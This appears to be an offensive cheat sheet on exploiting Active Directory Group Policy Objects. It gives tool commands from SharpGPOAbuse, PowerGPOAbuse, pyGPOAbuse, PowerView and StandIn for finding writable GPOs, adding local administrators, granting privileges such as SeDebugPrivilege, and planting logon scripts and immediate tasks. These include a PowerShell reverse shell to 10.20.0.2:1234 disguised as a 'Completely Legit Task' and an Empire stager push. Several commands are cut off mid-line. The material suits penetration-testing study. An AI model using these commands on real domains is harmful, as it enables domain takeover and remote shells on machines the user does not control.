# Group Policy Objects (GPO) Exploitation

## Tools: Bloodhound, PowerGPOAbuse, SharpGPOAbuse, pyGPOAbuse, Powerview, StandIn

## Location stored: SYSVOL directory

### Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner

### GPO Prioritization: Organization Unit > Domain > Site > Local

### GPO are stored in the DC in \\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\ , inside two folders User and Machine. If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at Machine\Preferences\ScheduledTasks .

### Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command:

```
gpupdate /force .
```

## Finding vulnerable GPO

### Look a GPLink where you have the Write right.

```
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*WriteProperty*" }
```

#### 1)

```
runas /netonly /user:DOMAIN\AD_USERNAME cmd.exe
```

#### 2)

```
dir \\DOMAIN\sysvol
```

#### 3) mmc

#### 4) File -> Add/Remove Snap-in

#### 5) Group Policy Management then click Add

#### 6) OK

#### 7) Navigate to GPO our user has permission to modify

#### 8) Right-click on GPO and select edit

### Add our account to local groups

#### 1) Expand Computer Configuration

#### 2) Expand Policies

#### 3) Expand Windows Settings

#### 4) Expand Security Settings

#### 5) Right-click on Restricted Groups and select Add Group

#### 6) Click browse, enter IT Support (example) and click Check Names

#### 7) Click OK twice

#### 8) On second filter, add Administrators and Remote Desktop Users groups

#### 9) Apply and OK then WAIT FOR 15 MINUTES FOR THE GPO TO BE APPLIED

## SharpGPOAbuse <https://github.com/FSecureLABS/SharpGPOAbuse>

#### 1) Build and configure SharpGPOAbuse

```
Install-Package CommandLineParser -Version 1.9.3.15

$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.
```

#### 2) Adding User Rights

```
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight"
```

#### 3) Adding a Local Admin

```
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
```

#### 4) Configuring a User or Computer Logon script

```
.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents
```

#### 5) Configuring a Computer or User Immediate Task

### /!\ Intended to "run once" per GPO refresh, not run once per system

```
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command

.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\
```

## PowerGPOAbuse <https://github.com/rootSySdk/PowerGPOAbuse>

#### 1) Run the module

```
PS> . .\PowerGPOAbuse.ps1
```

#### 2) Adding a localadmin

```
PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
```

#### 3) Assign a new right

```
PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
```

#### 4) Adding a New Computer/User script

```
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get
```

#### 5) Create an immediate task

```
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments
```

## pyGPOAbuse <https://github.com/Hackndo/pyGPOAbuse>

#### 1) Add john user to local administrators group (Password: H4x00r123..)

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

#### 2) Reverse shell

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

-powershell\
-command "$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\
-taskname "Completely Legit Task"\
-description "Dis is legit, pliz no delete"\
-user

## Powerview

#### 1) Enumerate GPO

```
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
```

#### 2) New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO

```
New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments
```

## StandIn <https://github.com/FuzzySecurity/StandIn>

#### 1) Add a local administrator

```
StandIn.exe --gpo --filter Shards --localadmin user002
```

#### 2) Set custom right to a user

```
StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege
```

#### 3) Execute custom command

```
StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK
```